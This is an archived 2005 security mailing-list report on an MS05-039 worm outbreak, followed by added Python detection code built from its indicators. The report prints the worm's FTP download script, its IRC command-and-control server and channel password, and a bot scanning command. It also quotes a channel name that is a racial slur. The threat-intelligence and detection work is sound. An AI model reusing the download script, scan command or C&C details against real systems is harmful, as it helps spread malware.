[Dshield] MS05-039 Attack -- Info
Eric Kedrosky
ekk at nortel.com
Mon Aug 15 12:14:26 GMT 2005
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
A major outbreak started, for me, in the Asia Pacific region around
12:00am EST August 15th, 2005.
This is associated with an exploit for the MS05-039 vulnerability. Once
the virus file is executed on the system it connects home to the Command
and Control (C&C) IRC server and then starts scanning for other
vulnerable systems on its B Class network on port 445/tcp.
Below is the technical info that I have gathered thus far:
Virus File Information
----------------------
So far this is the only sample that I have been able to capture
File: winpnp.exe
MD5 Hash: 105f1217a81be3d5dc893623c376b2c5
Size: 276480
This file is commonly found at C:\Winnt\System32\ with attributes SHR
File: o
MD5 hash: 8727c0addbf0d89f022366fc151309b5
Type: ASCII text, with CRLF line terminators
Size: 66 KB
This file is commonly found at C:\Winnt\System32\ with attributes A
Contents:
open <IP of Infected System> 33551
user 1 1
get winpnp.exe
quit
DNS Stuff
---------
real.atillackici.net
--> 62.193.233.52 (rDNS --> wpc1336.amenworld.com)
--> 84.244.7.62 (rDNS --> serv-2-7-62.lycos-vds.com)
IRC C&C Information
-------------------
irc2.samurai.net
Port: 8080
Channel: #niggah
Password: staner
Topic: .advscan pnp445 200 7 0 -r -s
I also saw this while monitoring the channel:
"kevin sets mode: +o kevin"
More info will follow as I collect it.
If you need to, please feel free to contact me offline.
--
Eric Kedrosky
Security Analyst - Malware
Nortel
ekk at nortel.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.0 (MingW32)
Comment: Using GnuPG with Thunderbird - http://enigmail.mozdev.org
iD8DBQFDAIcizarw7+pQTZ0RAi+tAJ9V/Cottsrkf3DtUzxv8dlHgSQBkgCdHyJj
e0KFotqYS/EJDUalDcisHUo=
=7E0n
-----END PGP SIGNATURE-----
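The indicators in the post above (the two file hashes, the FTP script "o", the C&C addresses, the 445/tcp scanning of the local class B) can be turned into simple detection logic. The following is an added example written for this archive page, not the author's or Nortel's tooling: it parses an "o"-style FTP script to recover the download source, matches file hashes against the two MD5s reported, and runs over a handful of constructed flow records to flag hosts that sweep their own /16 on 445/tcp, contact the listed C&C IPs on 8080, or fetch from the dropper's FTP port 33551. The function names, the thresholds and all sample records are assumptions; 192.0.2.10 is a documentation address standing in for the post's "<IP of Infected System>".

```python
"""Detection helpers built from the MS05-039 worm indicators in the post.

Added example (hypothetical code, not from the original message). Every
constant below is copied from the post; every sample record is constructed.
"""
import hashlib
import re
from collections import defaultdict

# MD5s reported in the post, keyed to the file they identify.
KNOWN_MD5 = {
    "105f1217a81be3d5dc893623c376b2c5": "winpnp.exe",
    "8727c0addbf0d89f022366fc151309b5": "o (ftp script)",
}
# Resolved addresses of real.atillackici.net and the IRC C&C port from the post.
CNC_IPS = {"62.193.233.52", "84.244.7.62"}
CNC_IRC_PORT = 8080
# Port the 'o' script opens on the already-infected host to pull winpnp.exe.
DROPPER_FTP_PORT = 33551

# Constructed copy of the 'o' script with a documentation IP in place of
# "<IP of Infected System>".
SAMPLE_FTP_SCRIPT = "open 192.0.2.10 33551\r\nuser 1 1\r\nget winpnp.exe\r\nquit\r\n"


def parse_ftp_script(text: str) -> dict:
    """Recover host, port and fetched files from an ftp.exe -s style script."""
    info = {"host": None, "port": None, "files": []}
    for line in text.splitlines():
        parts = line.strip().split()
        if not parts:
            continue
        cmd = parts[0].lower()
        if cmd == "open" and len(parts) >= 2:
            info["host"] = parts[1]
            info["port"] = int(parts[2]) if len(parts) > 2 else 21
        elif cmd == "get" and len(parts) >= 2:
            info["files"].append(parts[1])
    return info


def classify_md5(md5hex: str):
    """Return the indicator name for a known hash, or None."""
    return KNOWN_MD5.get(md5hex.lower())


def classify_bytes(data: bytes):
    """Hash raw file content and look it up (MD5 only because that is what the post gives)."""
    return classify_md5(hashlib.md5(data).hexdigest())


# Constructed flow records: "<time> <src> -> <dst>:<dport> <flags>".
# 10.5.1.10 sweeps 25 distinct hosts inside its own /16 on 445/tcp.
SAMPLE_CONNECTIONS = [
    f"2005-08-15T05:00:{i:02d} 10.5.1.10 -> 10.5.{i // 5}.{i + 1}:445 SYN"
    for i in range(25)
] + [
    "2005-08-15T05:01:00 10.5.1.20 -> 10.5.1.1:445 SYN",      # benign file share
    "2005-08-15T05:01:05 10.5.1.20 -> 10.5.1.1:445 SYN",
    "2005-08-15T05:01:10 10.5.1.30 -> 62.193.233.52:8080 SYN",  # IRC C&C
    "2005-08-15T05:01:20 10.5.1.40 -> 10.5.1.10:33551 SYN",    # dropper fetch
]

_FLOW_RE = re.compile(r"^(\S+) (\d+\.\d+\.\d+\.\d+) -> (\d+\.\d+\.\d+\.\d+):(\d+)")


def analyze_connections(lines, scan_threshold: int = 20) -> dict:
    """Flag /16 sweeps on 445/tcp, C&C contacts and dropper fetches in flow records."""
    targets_445 = defaultdict(set)
    cnc_contacts, dropper_fetches = [], []
    for line in lines:
        m = _FLOW_RE.match(line)
        if not m:
            continue
        _, src, dst, dport = m.groups()
        dport = int(dport)
        same_class_b = src.split(".")[:2] == dst.split(".")[:2]
        if dport == 445 and same_class_b:
            targets_445[src].add(dst)
        if dport == CNC_IRC_PORT and dst in CNC_IPS:
            cnc_contacts.append((src, dst, dport))
        if dport == DROPPER_FTP_PORT:
            dropper_fetches.append((src, dst, dport))
    scanners = {src: len(t) for src, t in targets_445.items() if len(t) >= scan_threshold}
    return {"scanners": scanners, "cnc_contacts": cnc_contacts, "dropper_fetches": dropper_fetches}


if __name__ == "__main__":
    print(parse_ftp_script(SAMPLE_FTP_SCRIPT))
    print(analyze_connections(SAMPLE_CONNECTIONS))
```

The scan threshold is deliberately coarse: the worm's topic line asks for 200 threads against pnp445, so a real infection touches far more than 20 neighbours within seconds, and a lower threshold only buys false positives from legitimate SMB traffic.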